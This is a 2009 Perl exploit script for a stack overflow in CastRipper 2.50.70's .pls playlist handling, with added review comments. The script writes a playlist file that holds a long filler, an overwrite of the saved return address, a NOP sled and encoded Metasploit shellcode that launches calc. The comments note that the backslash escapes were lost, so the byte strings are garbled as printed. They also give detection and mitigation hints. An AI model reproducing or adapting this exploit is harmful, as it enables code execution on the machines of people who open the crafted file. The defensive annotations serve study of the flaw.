
# Title : CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Published : 2009-05-12
# Author : zAx


#!/usr/bin/perl
# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit
# Exploited By : zAx
# ThE-zAx@HoTMaiL.CoM
#
# Purpose: proof-of-concept generator. It concatenates a minimal .pls
# playlist header, a long filler, a 4-byte value, a short pad and an
# embedded payload, and appends the result to zAx.pls in the current
# directory. Per the title, the file targets a stack overflow in the
# .pls handling of CastRipper 2.50.70.
#
# NOTE(review): the string literals on this page carry no backslashes
# ("x0A", "x41", and the trailing "n" in the first banner), which looks
# like escaping lost when the page was extracted. As printed, the strings
# are plain text rather than raw bytes.
#
# NOTE(review): no `use strict` / `use warnings`; every variable below is
# a package global.
#
# Defensive reading: the oversized value sits in the File1= entry, so the
# flaw is presumably an unbounded copy of that field into a fixed stack
# buffer (inferred from the layout, not shown here). A playlist whose
# File1= value runs to tens of kilobytes, or contains non-printable bytes,
# is a strong anomaly signal for mail/web gateways and file scanners.
# Stack cookies, DEP and ASLR on all loaded modules are the generic
# mitigations for this class of bug.

# Console banner only; no effect on the generated file.
print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploitn";
print "Exploited By : zAx";
print "Contact at : ThE-zAx@HoTMaiL.CoM";
# Playlist preamble: section name, entry count, and the start of the
# File1 URL. Everything appended afterwards becomes part of that value.
$header = "[playlist]x0ANumberOfEntries=1x0AFile1=http://";
# Filler, repeated 26369 times; presumably the distance from the start of
# the field to the saved return address (TODO confirm against the binary).
$junk = "x41" x 26369;
# Four hex-escaped bytes placed right after the filler; the variable name
# indicates they are meant to land on the saved instruction pointer.
$eip="x7DxBCx01x10"; # Universal
# Ten repetitions of the 0x90 escape, placed between $eip and the payload.
$nopsled = "x90" x 10;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Per the author's comment above, this is an encoded Metasploit payload
# whose command is calc, i.e. a visible, harmless demonstration of
# code execution rather than a weaponised payload.
$shellcode =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x88".
"xd3x37xccx83xebxfcxe2xf4x74x3bx73xccx88xd3xbcx89".
"xb4x58x4bxc9xf0xd2xd8x47xc7xcbxbcx93xa8xd2xdcx85".
"x03xe7xbcxcdx66xe2xf7x55x24x57xf7xb8x8fx12xfdxc1".
"x89x11xdcx38xb3x87x13xc8xfdx36xbcx93xacxd2xdcxaa".
"x03xdfx7cx47xd7xcfx36x27x03xcfxbcxcdx63x5ax6bxe8".
"x8cx10x06x0cxecx58x77xfcx0dx13x4fxc0x03x93x3bx47".
"xf8xcfx9ax47xe0xdbxdcxc5x03x53x87xccx88xd3xbcxa4".
"xb4x8cx06x3axe8x85xbex34x0bx13x4cx9cxe0x23xbdxc8".
"xd7xbbxafx32x02xddx60x33x6fxb0x56xa0xebxd3x37xcc";
# NOTE(review): bareword filehandle, two-argument open, and no check of
# the return value. The ">>" mode appends, so running the script twice
# leaves two copies of the content in zAx.pls.
open(zax,">>zAx.pls");
# Written in this order: header, filler, $eip, pad, payload.
print zax $header.$junk.$eip.$nopsled.$shellcode;
# Printed unconditionally, even if the open above failed.
print "[+] Done !! [+]";
close(zax);
